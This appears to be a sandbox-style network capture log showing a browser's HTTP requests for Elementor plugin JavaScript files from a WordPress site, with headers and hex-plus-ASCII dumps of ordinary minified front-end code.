                                                                                                                                                                                                                              Data Ascii: 280d/**handles:ecspro**/var EleCustomSkinSlider=elementorModules.frontend.handlers.Base.extend({getSkinPrefix:function e(){return"custom_"},getDefaultSettings:function e(){return{selectors:{carousel:".swiper-container",slideContent:".swiper-slide"}}},
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 65 72 73 65 28 29 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 76 61 72 20 74 3d 6f 5b 65 5d 7c 7c 61 3b 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 73 5b 65 5d 2e 76 61 6c 75 65 5d 3d 7b 73 6c 69 64 65 73 50 65 72 56 69 65 77 3a 2b 6e 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 68 6f 77 5f 22 2b 65 5d 7c 7c 74 2c 73 6c 69 64 65 73 50 65 72 47 72 6f 75 70 3a 2b 6e 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 63 72 6f 6c 6c 5f 22 2b 65 5d 7c 7c 31 7d 2c 61 3d 2b 6e 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 68 6f 77 5f 22 2b 65 5d 7c 7c 74 7d 29 2c 22 79 65 73 22 3d 3d 3d 6e 5b 74 68 69 73 2e
                                                                                                                                                                                                                              Data Ascii: erse().forEach(e=>{var t=o[e]||a;r.breakpoints[s[e].value]={slidesPerView:+n[this.getSkinPrefix()+"slides_to_show_"+e]||t,slidesPerGroup:+n[this.getSkinPrefix()+"slides_to_scroll_"+e]||1},a=+n[this.getSkinPrefix()+"slides_to_show_"+e]||t}),"yes"===n[this.
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 68 61 6e 64 6c 65 45 6c 65 6d 65 6e 74 6f 72 42 72 65 61 6b 70 6f 69 6e 74 73 3a 21 30 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 7d 7d 3b 6e 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 2e 6d 6f 62 69 6c 65 2e 76 61 6c 75 65 5d 3d 7b 73 6c 69 64 65 73 50 65 72 56 69 65 77 3a 2b 74 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 68 6f 77 5f 6d 6f 62 69 6c 65 22 5d 7c 7c 31 2c 73 6c 69 64 65 73 50 65 72 47 72 6f 75 70 3a 2b 74 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 63 72 6f 6c 6c 5f 6d 6f 62 69 6c 65 22 5d 7c 7c 31 7d 2c 6e 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 2e 74 61 62 6c 65 74 2e 76 61 6c 75 65 5d 3d 7b 73 6c 69 64 65 73 50 65 72 56 69
                                                                                                                                                                                                                              Data Ascii: handleElementorBreakpoints:!0,breakpoints:{}};n.breakpoints[o.mobile.value]={slidesPerView:+t[this.getSkinPrefix()+"slides_to_show_mobile"]||1,slidesPerGroup:+t[this.getSkinPrefix()+"slides_to_scroll_mobile"]||1},n.breakpoints[o.tablet.value]={slidesPerVi
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 21 21 74 68 69 73 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 70 6f 73 74 5f 73 6c 69 64 65 72 22 29 7d 2c 74 6f 67 67 6c 65 50 61 75 73 65 4f 6e 48 6f 76 65 72 3a 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 74 3f 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 61 72 6f 75 73 65 6c 2e 6f 6e 28 7b 6d 6f 75 73 65 65 6e 74 65 72 3a 28 29 3d 3e 7b 7d 2c 6d 6f 75 73 65 6c 65 61 76 65 3a 28 29 3d 3e 7b 7d 7d 29 3a 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 61 72 6f 75 73 65 6c 2e 6f 66 66 28 22 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 22 29 7d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 69 66 28 74 68 69
                                                                                                                                                                                                                              Data Ascii: ion e(){return!!this.getElementSettings(this.getSkinPrefix()+"post_slider")},togglePauseOnHover:function e(t){t?this.elements.$carousel.on({mouseenter:()=>{},mouseleave:()=>{}}):this.elements.$carousel.off("mouseenter mouseleave")},run:function e(){if(thi
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6f 6b 73 2e 61 64 64 41 63 74 69 6f 6e 28 22 66 72 6f 6e 74 65 6e 64 2f 65 6c 65 6d 65 6e 74 5f 72 65 61 64 79 2f 70 6f 73 74 73 2e 63 75 73 74 6f 6d 22 2c 65 29 3b 76 61 72 20 65 3d 65 3d 3e 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 2e 61 64 64 48 61 6e 64 6c 65 72 28 45 6c 65 43 75 73 74 6f 6d 53 6b 69 6e 53 6c 69 64 65 72 41 72 63 68 69 76 65 2c 7b 24 65 6c 65 6d 65 6e 74 3a 65 7d 29 7d 3b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 68 6f 6f 6b 73 2e 61 64 64 41 63 74 69 6f 6e 28 22 66 72 6f 6e 74 65 6e 64 2f 65 6c 65 6d 65 6e 74 5f 72 65 61 64 79 2f 61 72 63 68 69 76 65 2d 70 6f 73 74 73 2e 61 72 63 68 69 76 65 5f 63 75 73 74 6f 6d 22 2c 65 29 7d 29 3b 76 61 72 20 45 6c 65 43 75 73
                                                                                                                                                                                                                              Data Ascii: oks.addAction("frontend/element_ready/posts.custom",e);var e=e=>{elementorFrontend.elementsHandler.addHandler(EleCustomSkinSliderArchive,{$element:e})};elementorFrontend.hooks.addAction("frontend/element_ready/archive-posts.archive_custom",e)});var EleCus
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 20 65 28 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 2c 69 3d 74 68 69 73 2c 74 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 2c 22 3a 61 66 74 65 72 22 29 2e 63 6f 6e 74 65 6e 74 2c 73 3d 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 29 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 6f 73 74 73 43 6f 6e 74 61 69 6e 65 72 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 73 2e 63 6c 61 73 73 65 73 2e 68 61 73 49 74 65 6d 52 61 74 69 6f 2c 21 21 74 2e 6d 61 74 63 68 28 2f 5c 64 2f 29 29 2c 69 2e 69 73 4d 61 73 6f 6e 72 79 45 6e 61 62 6c 65 64 28 29 7c 7c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 6f 73 74 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 28 74 68 69 73 29 2c
                                                                                                                                                                                                                              Data Ascii: e(){var n=jQuery,i=this,t=getComputedStyle(this.$element[0],":after").content,s=this.getSettings();this.elements.$postsContainer.toggleClass(s.classes.hasItemRatio,!!t.match(/\d/)),i.isMasonryEnabled()||this.elements.$posts.each(function(){var e=n(this),
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6e 67 73 28 22 63 6f 6c 73 43 6f 75 6e 74 22 29 2c 76 65 72 74 69 63 61 6c 53 70 61 63 65 42 65 74 77 65 65 6e 3a 73 7d 29 2e 72 75 6e 28 29 2c 45 43 53 5f 43 6f 6c 75 6d 6e 73 5f 43 6f 75 6e 74 3d 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 22 63 6f 6c 73 43 6f 75 6e 74 22 29 2c 45 43 53 5f 61 64 64 5f 61 63 74 69 6f 6e 28 22 61 6a 61 78 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 45 43 53 5f 72 65 73 65 74 5f 6d 61 73 6f 6e 72 79 28 74 2e 24 70 6f 73 74 73 43 6f 6e 74 61 69 6e 65 72 29 2c 6d 79 6d 61 73 6f 6e 72 79 3d 6e 65 77 20 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 75 74 69 6c 73 2e 4d 61 73 6f 6e 72 79 28 7b 63 6f 6e 74 61 69 6e 65 72 3a 74 2e 24 70 6f 73 74 73 43 6f 6e 74 61 69 6e 65 72 2c 69 74 65 6d 73 3a 74 2e 24 70 6f 73 74 73 43
                                                                                                                                                                                                                              Data Ascii: ngs("colsCount"),verticalSpaceBetween:s}).run(),ECS_Columns_Count=this.getSettings("colsCount"),ECS_add_action("ajax",function(){ECS_reset_masonry(t.$postsContainer),mymasonry=new elementorModules.utils.Masonry({container:t.$postsContainer,items:t.$postsC
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1170INData Raw: 65 77 28 29 7b 6a 51 75 65 72 79 28 22 2e 65 63 73 2d 6c 61 7a 79 6c 6f 61 64 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 6e 56 69 65 77 28 29 26 26 28 69 64 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 69 64 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 6e 69 6d 61 74 69 6f 6e 2d 68 69 64 64 65 6e 22 29 2c 45 43 53 5f 6c 6f 61 64 5f 6e 65 78 74 5f 70 61 67 65 28 69 64 29 29 7d 29 7d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 65 6c 65 6d 65 6e 74 6f 72 2f 66 72 6f 6e 74 65 6e 64 2f 69 6e 69 74 22 2c 28 29 3d 3e 7b 76 61 72 20 65 3d 65 3d 3e 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e
                                                                                                                                                                                                                              Data Ascii: ew(){jQuery(".ecs-lazyload").each(function(){jQuery(this).inView()&&(id=jQuery(this).attr("data-targetid"),jQuery(this).removeClass("animation-hidden"),ECS_load_next_page(id))})}jQuery(window).on("elementor/frontend/init",()=>{var e=e=>{elementorFrontend.
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              130192.168.2.649867141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC652OUTGET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:49 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f49-1845"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f16ffde712-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC877INData Raw: 31 38 34 35 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 72 2c 61 2c 6e 3d 7b 7d 2c 63 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 65 29 7b 76 61 72 20 72 3d 63 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 63 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 63 61 6c 6c 28 61 2e 65 78 70 6f 72 74 73 2c 61 2c 61 2e 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 2c 61 2e 65 78 70 6f 72 74
                                                                                                                                                                                                                              Data Ascii: 1845/*! elementor-pro - v3.24.0 - 09-10-2024 */(()=>{"use strict";var e,r,a,n={},c={};function __webpack_require__(e){var r=c[e];if(void 0!==r)return r.exports;var a=c[e]={exports:{}};return n[e].call(a.exports,a,a.exports,__webpack_require__),a.export
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 34 62 30 37 32 35 39 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 35 31 39 3d 3d 3d 65 3f 22 76 69 64 65 6f 2d 70 6c 61 79 6c 69 73 74 2e 61 66 32 30 66 64 39 66 64 38 37 37 38 39 32 39 38 32 39 65 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 33 37 35 3d 3d 3d 65 3f 22 70 61 79 70 61 6c 2d 62 75 74 74 6f 6e 2e 66 34 66 36 34 65 34 36 31 37 33 66 35 30 37 30 31 39 34 39 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 32 33 34 3d 3d 3d 65 3f 22 35 32 65 30 33 32 39 38 65 37 66 30 38 35 32 63 39 36 61 31 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 38 35 37 3d 3d 3d 65 3f 22 73 74 72 69 70 65 2d 62 75 74 74 6f 6e 2e 36 31 64 39 33 35 39 34 64 36 62 37 38 36 35 66 38 62 33 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 35 38 31 3d 3d 3d 65 3f
                                                                                                                                                                                                                              Data Ascii: 4b072592.bundle.min.js":519===e?"video-playlist.af20fd9fd8778929829e.bundle.min.js":375===e?"paypal-button.f4f64e46173f50701949.bundle.min.js":234===e?"52e03298e7f0852c96a1.bundle.min.js":857===e?"stripe-button.61d93594d6b7865f8b3f.bundle.min.js":581===e?
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6d 6d 65 72 63 65 2d 6d 65 6e 75 2d 63 61 72 74 2e 65 62 36 31 66 65 30 38 36 32 34 35 34 38 35 33 31 30 61 34 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 38 30 3d 3d 3d 65 3f 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 75 72 63 68 61 73 65 2d 73 75 6d 6d 61 72 79 2e 33 36 37 36 63 63 64 38 63 32 39 65 66 30 39 32 34 62 38 34 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 33 35 34 3d 3d 3d 65 3f 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 2d 70 61 67 65 2e 37 37 36 62 34 63 65 63 34 35 30 37 30 66 65 33 32 36 33 36 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 34 3d 3d 3d 65 3f 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 2e 64 30 64 30 31 35 33 30 66 35 62 65 36 37 33 36 62 35 64 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73
                                                                                                                                                                                                                              Data Ascii: mmerce-menu-cart.eb61fe086245485310a4.bundle.min.js":80===e?"woocommerce-purchase-summary.3676ccd8c29ef0924b84.bundle.min.js":354===e?"woocommerce-checkout-page.776b4cec45070fe32636.bundle.min.js":4===e?"woocommerce-cart.d0d01530f5be6736b5d2.bundle.min.js
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6c 6f 62 61 6c 54 68 69 73 29 72 65 74 75 72 6e 20 67 6c 6f 62 61 6c 54 68 69 73 3b 74 72 79 7b 72 65 74 75 72 6e 20 74 68 69 73 7c 7c 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 7d 7d 28 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 3d 28 65 2c 72 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 72 29 2c 72 3d 7b 7d 2c 61 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 3a 22 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6c 3d 28 65 2c 6e 2c 63 2c 69 29
                                                                                                                                                                                                                              Data Ascii: lobalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),__webpack_require__.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),r={},a="elementor-pro:",__webpack_require__.l=(e,n,c,i)
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1237INData Raw: 72 28 22 41 75 74 6f 6d 61 74 69 63 20 70 75 62 6c 69 63 50 61 74 68 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 69 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 22 29 3b 65 3d 65 2e 72 65 70 6c 61 63 65 28 2f 23 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5b 5e 5c 2f 5d 2b 24 2f 2c 22 2f 22 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 70 3d 65 7d 29 28 29 2c 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 39 37 38 3a 30 7d 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 66 2e 6a 3d 28 72 2c 61 29 3d 3e 7b 76 61 72 20 6e 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 28 65 2c 72 29 3f 65 5b 72 5d 3a 76 6f 69 64 20 30 3b 69 66 28
                                                                                                                                                                                                                              Data Ascii: r("Automatic publicPath is not supported in this browser");e=e.replace(/#.*$/,"").replace(/\?.*$/,"").replace(/\/[^\/]+$/,"/"),__webpack_require__.p=e})(),(()=>{var e={978:0};__webpack_require__.f.j=(r,a)=>{var n=__webpack_require__.o(e,r)?e[r]:void 0;if(
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              131192.168.2.649872141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC637OUTGET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-a169"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614823
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f20996466b-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 31 39 5d 2c 7b 39 32 32 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 6f 3d 6e 28 33 32 30 33 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 76 61 72 20 73 3d 6f 28 6e 28 38 31 33 35 29 29 3b 63 6c 61 73 73 20 5f 64 65 66 61
                                                                                                                                                                                                                              Data Ascii: 7dc5/*! elementor - v3.24.0 - 09-10-2024 */"use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var o=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=o(n(8135));class _defa
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 74 43 6c 61 73 73 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 64 61 74 61 28 29 2c 6e 3d 74 2e 65 6c 65 6d 65 6e 74 6f 72 49 64 2c 6f 3d 74 2e 65 6c 65 6d 65 6e 74 6f 72 54 79 70 65 2c 73 3d 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 43 6c 61 73 73 65 73 5b 6f 5d 7c 7c 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 43 6c 61 73 73 65 73 2e 62 61 73 65 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 73 5b 6e 5d 3d 6e 65 77 20 73 28 7b 24 65 6c 65 6d 65 6e 74 3a 65 2c 69 64 3a 6e 7d 29 7d 7d 74 2e 64 65 66 61 75 6c 74 3d 5f 64 65 66 61 75 6c 74 7d 2c 39 38 30 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 6f 3d 6e 28 33 32 30 33 29 2c 73 3d 6f 28 6e 28 36 33 39 37 29 29 2c 69 3d 6f 28 6e 28 38 37 30 34 29 29 2c 72 3d 6f 28 6e 28 34 39 38 35 29 29 2c 61 3d 6f 28 6e 28 37 35 33
                                                                                                                                                                                                                              Data Ascii: tClass(e){const t=e.data(),n=t.elementorId,o=t.elementorType,s=this.documentClasses[o]||this.documentClasses.base;this.documents[n]=new s({$element:e,id:n})}}t.default=_default},9804:(e,t,n)=>{var o=n(3203),s=o(n(6397)),i=o(n(8704)),r=o(n(4985)),a=o(n(753
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 5b 22 66 6c 6f 61 74 69 6e 67 2d 62 61 72 73 2d 76 61 72 2d 31 2e 64 65 66 61 75 6c 74 22 5d 3d 28 29 3d 3e 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 6e 2e 62 69 6e 64 28 6e 2c 37 37 31 32 29 29 29 3b 63 6f 6e 73 74 20 61 64 64 45 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 3d 28 29 3d 3e 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 73 65 63 74 69 6f 6e 3d 5b 64 2e 64 65 66 61 75 6c 74 2c 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 2c 6c 2e 64 65 66 61 75 6c 74 2c 63 2e 64 65 66 61 75 6c 74 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 5b 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 5d 2c 65 6c 65 6d 65 6e 74 6f 72 46 72
                                                                                                                                                                                                                              Data Ascii: lementsHandlers["floating-bars-var-1.default"]=()=>Promise.resolve().then(n.bind(n,7712)));const addElementsHandlers=()=>{this.elementsHandlers.section=[d.default,...i.default,l.default,c.default],this.elementsHandlers.container=[...i.default],elementorFr
